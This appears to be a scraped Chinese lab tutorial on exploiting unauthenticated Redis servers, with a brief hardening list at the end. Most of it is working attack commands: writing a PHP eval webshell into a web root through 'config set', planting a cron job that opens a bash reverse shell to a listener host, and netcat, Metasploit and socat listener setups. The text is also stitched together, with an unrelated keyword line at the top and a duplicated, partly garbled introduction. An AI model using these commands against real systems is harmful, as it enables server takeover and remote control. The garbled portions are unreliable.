专业网站设计流程图,wordpress设置打赏,100种宣传方式,wordpress多站点命名目录
简介
靶机配置
Redis持久化
Redis动态修改配置
webshell
反弹shell
Redis写入反弹shell任务
加固方案 简介
Redis#xff08;Remote Dictionary Server 远程字典服务器#xff09;是一个开源的内存数据库#xff0c;也被称为数据结构服务器#xff0c;它支持…目录
简介
靶机配置
Redis持久化
Redis动态修改配置
webshell
反弹shell
Redis写入反弹shell任务
加固方案 简介
RedisRemote Dictionary Server 远程字典服务器是一个开源的内存数据库也被称为数据结构服务器它支持多种数据结构如字符串、哈希表、列表、集合、有序集合等。Redis旨在提供一个高性能、持久化的 key-value 存储解决方案并且具有丰富的功能和灵活的部署方式。
以下是 Redis 的一些主要特点和用途 内存存储Redis将数据存储在内存中因此具有非常高的读写性能。它通常被用作缓存系统用来加速对数据库或其他后端存储的访问。 数据结构丰富Redis支持多种数据结构包括字符串、哈希表、列表、集合、有序集合等这使得它可以适用于各种不同的应用场景。 持久化除了存储在内存中Redis还支持多种持久化方式如RDB快照和AOF日志以确保数据不会因服务器重启或故障而丢失。 发布/订阅Redis支持发布/订阅模式允许客户端订阅消息通道并接收特定类型的消息。 事务Redis支持事务操作允许执行一系列命令保证这些命令要么全部执行要么全部不执行从而保持数据的一致性。 分布式Redis可以被配置成分布式系统通过复制和分片来提高可用性和扩展性。 缓存系统由于其高性能和丰富的功能Redis经常被用作缓存系统用来减轻后端数据库的压力。 靶机配置
1、关闭保护模式 protected-mode 2、取消IP绑定 bind 3、开放6379端口或者关闭防火墙 4、不需要密码默认 requirepass Redis持久化
RDB Redis DataBase 默认 AOF Append Only File 配置 1、save 3600 1 #自动触发规则 2、dbfilename dump.rdb #文件名 3、dir ./ #存储路径 手动触发保存命令save / bgsave Redis动态修改配置
config set动态修改配置重启以后失效 config set dir /www/admin/localhost_80/wwwroot config set dbfilename redis.php webshell
redis-cli -h 192.168.142.66 -p 6379
config set dir /www/admin/localhost_80/wwwroot
config set dbfilename redis.php
set x ?php eval($_POST[wuya]); ?
save 反弹shell
攻击机
netcat nc -lvp 7777 (-nlvp lvvp)
msf msfconsoleuse exploit/multi/handlerset payload php/meterpreter/reverse_tcpset lhost 192.168.142.141set lport 7777run
socat socat TCP-LISTEN:7777 -
靶机 Redis写入反弹shell任务
Linux crontab
crontab -u root -r 删除某个用户的任务
crontab -u root time.cron 把文件添加到某个用户的任务
crontab -u root -l 列举某个用户的任务
crontab -u root -e 编辑某个用户的任务
cron文件存储路径
/var/spool/cron 这个文件负责安排由系统管理员制定的维护系统以及其他任务的crontab
/etc/crontab 放的是对应周期的任务dalily、hourly 、monthly、weekly
payload:
set x \n* * * * * bash -i /dev/tcp/192.168.1.44/7777 01\n
config set dir /var/spool/cron/
config set dbfilename root
save 加固方案
1、限制访问IP 2、修改默认端口 3、使用密码访问 4、不要用root运行Redis
